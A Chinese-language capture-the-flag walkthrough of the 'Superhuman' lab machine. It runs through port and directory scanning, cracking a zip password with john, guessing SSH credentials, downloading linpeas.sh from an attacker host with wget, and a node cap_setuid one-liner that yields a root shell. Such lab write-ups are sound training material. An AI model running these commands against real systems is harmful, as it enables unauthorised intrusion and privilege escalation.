Superhuman

信息收集

IP=192.168.0.154
nmap $IP -p- -sV -A


Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-16 00:20 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 51.32% done; ETC: 00:20 (0:00:03 remaining)
Nmap scan report for 192.168.0.154
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA)
|   256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA)
|_  256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:8C:77:0A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.0.154

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds

80 开着 ，去看看发现一片空白，查看源码：

<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=windows-1252" />
  </head>
  <body>
    <p>
      <img 
         src="index_fichiers/nietzsche.jpg" 
        alt=""
        style="display: block; margin-left: auto; margin-right: auto;"
      >
    </p>
    <!-- If your eye was sharper, you would see everything in motion, lol -->
  </body>
</html>

直接访问图片，并不存在：

curl http://192.168.0.154/index_fichiers/nietzsche.jpg

返回 404 。

尝试访问 /index_fichiers/ 目录，也是 404

去掉目录，直接访问图片发现图片是存在的. 看文件名，这是尼采吗？

html 底部那句话： If your eye was sharper, you would see everything in motion, lol 意思是如果眼睛更尖锐，你会看到一切都在运动，哈哈。

那是啥玩意在动？ 先跑一遍目录， 在根目录下并没有啥，切换 http://192.168.0.154/index_fichiers/ 试试也没有收获。

gobuster dir -u http://192.168.0.154/index_fichiers/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,7z,zip,pdf

路径没有收获，那么就下载下来图片，看看有没有啥隐写之类的：

curl -o nietzsche.jpg http://192.168.0.154/nietzsche.jpg
└─# steghide info nietzsche.jpg
"nietzsche.jpg":
  format: jpeg
  capacity: 1.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!

这个，加密了？ 那么就说明真的有隐写。研究下怎么搞这个:

└─# stegseek --crack nietzsche.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.79% (133.2 MB)
[!] error: Could not find a valid passphrase.

完犊子，没密码。

目前陷入死局，不过想起之前说过的话，当没有信息的时候，就换更大的字典试试，先从扫描的字典开始换：

gobuster dir -u http://192.168.0.154/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt,html,7z,zip,pdf

果然，发现了 /notes-tips.txt 文件。

└─# curl http://192.168.0.154/notes-tips.txt
F(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC/g+jUD'3nBEb-A+De'u)F!,")@:UuC/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl/c

去赛博初始哪里 bake 下，这个是 base85 编码，解码后：

salome doesn't want me, I'm so sad... i'm sure god is dead...
I drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.

I must not forget to save it and put a good extension because I don't have much storage.

意思是：

salome 不喜欢我，我好伤心... 我确定上帝已经死了...
我喝了 6 升的保罗纳... 太醉了 lol. 我会写一首诗给她，她就会渴望我。我会叫它 salome_and_?? 我不知道。

我必须记住要保存它并放一个好扩展名，因为我没有太多存储空间。

这 TMD 跟猜谜一样， 不过， 我猜是 salome 和 什么什么。然后也没有啥空间，好的扩展名 难道是 zip 吗？或者 gz？7z？

echo 'zip' > zip.txt
echo 'gz' >> zip.txt
echo '7z' >> zip.txt

└─# wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -z file,/root/zip.txt --sc 200 http://192.168.0.154/salome_and_FUZZ.FUZ2Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.0.154/salome_and_FUZZ.FUZ2Z
Total requests: 168492

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000004600:   200        0 L      20 W       436 Ch      "me - zip"
000005637:   404        9 L      31 W       275 Ch      "current - 7z"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending

Total time: 50.35108
Processed Requests: 5635
Filtered Requests: 5634
Requests/sec.: 111.9141

找到了 zip 文件。
下载：

curl -o salome_and_me.zip  http://192.168.0.154/salome_and_me.zip
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   452  100   452    0     0   200k      0 --:--:-- --:--:-- --:--:--  220k

解压：

└─# unzip salome_and_me.zip
Archive:  salome_and_me.zip
[salome_and_me.zip] salome_and_me.txt password:

乖乖，还有密码。

zip2john salome_and_me.zip > zip.hash
└─# john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
turtle           (salome_and_me.zip/salome_and_me.txt)
1g 0:00:00:00 DONE (2025-08-16 01:29) 50.00g/s 409600p/s 409600c/s 409600C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

密码是 turtle 。

解压：

unzip -P turtle salome_and_me.zip

└─# cat salome_and_me.txt

----------------------------------------------------

             GREAT POEM FOR SALOME

----------------------------------------------------


My name is fred,
And tonight I'm sad, lonely and scared,
Because my love Salome prefers schopenhauer, asshole,
I hate him he's stupid, ugly and a peephole,
My darling I offered you a great switch,
And now you reject my love, bitch
I don't give a fuck, I'll go with another lady,
And she'll call me BABY!

来翻译一下下：

我的名字是 fred，今晚我很悲伤，孤独和害怕，因为我的爱人 salome 更喜欢 schopenhauer，混蛋，
我恨他，他愚蠢，丑陋，像个xxxx，
我的宝贝，我给你一个伟大的 switch，
现在你拒绝我的爱，婊子
我不在乎，我会和另一个女人在一起，
她会叫我 BABY！

所以我的名字是 fred。感觉应该是 ssh ？ 随手试下：

ssh [email protected]

密码试了试之前的 turtle 不是，salome 也不是，看来是真的不爱了。万万没想到，密码竟然是 schopenhauer 。都是汹涌的恨意。

本来想翻一翻文件，但是一执行ls,就退出 ssh：

┌──(root㉿kali)-[~/Superman]
└─# ssh [email protected]
[email protected]'s password:
Linux superhuman 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug 16 01:36:17 2025 from 192.168.0.30
fred@superhuman:~$
fred@superhuman:~$
fred@superhuman:~$ ls
lol
Connection to 192.168.0.154 closed.

神奇，那我就按 tab 呗：

fred@superhuman:~$ file
.bash_history  .bashrc        .local/        user.txt
.bash_logout   cmd.txt        .profile
fred@superhuman:~$ file user.txt
user.txt: ASCII text
fred@superhuman:~$ cat user.txt

拿到了 user.txt 文件。

提权

fred@superhuman:~$ sudo -l
-bash: sudo: command not found

sudo 没有，试试 linpeas.sh ：

wget http://192.168.0.30/linpeas.sh
sh linpeas.sh | tee out

不过因为 ls 会退出，所以没看到啥。

看来要修一下这个 ls

 which ls
/usr/bin/ls
fred@superhuman:~$ cat which ls^C
fred@superhuman:~$ cat /usr/bin/ls
echo "lol"
kill -9 "$(ps --pid $$ -oppid=)"

fred@superhuman:~$ busybox ls
cmd.txt     linpeas.sh  out         user.txt

不过有 busybox ，那么我们就可以用 busybox 来执行 ls 了：

fred@superhuman:~$ alias ls='busybox ls'
fred@superhuman:~$ ls
cmd.txt     linpeas.sh  out         user.txt

这样可以，那么我们要给 linpeas.sh 顶部加一个 alias ls='busybox ls' ：

然后再执行 linpeas.sh ：

fred@superhuman:~$ sh linpeas.sh -a | tee out

留意到一个高亮：

Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep

见这里：https://gtfobins.github.io/gtfobins/node/#capabilities

fred@superhuman:~$ node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
# id
uid=0(root) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
# cd /root/
# bash
root@superhuman:/root# busybox ls
root.txt
root@superhuman:/root# cat root.txt

#总结

大字典，大字典，大字典。
重要的事情说三遍。

里面的图片隐写我最后还是没用上。

如果系统功能有些异常，可以看看有没有 busybox ，如果有，那么就可以用 busybox 来执行命令。 没有可以从主机上拷贝一个。
然后灵活使用alias来绕过限制。 而且 ls 命令在 linpeas.sh 里也可以用 alias 来绕过限制。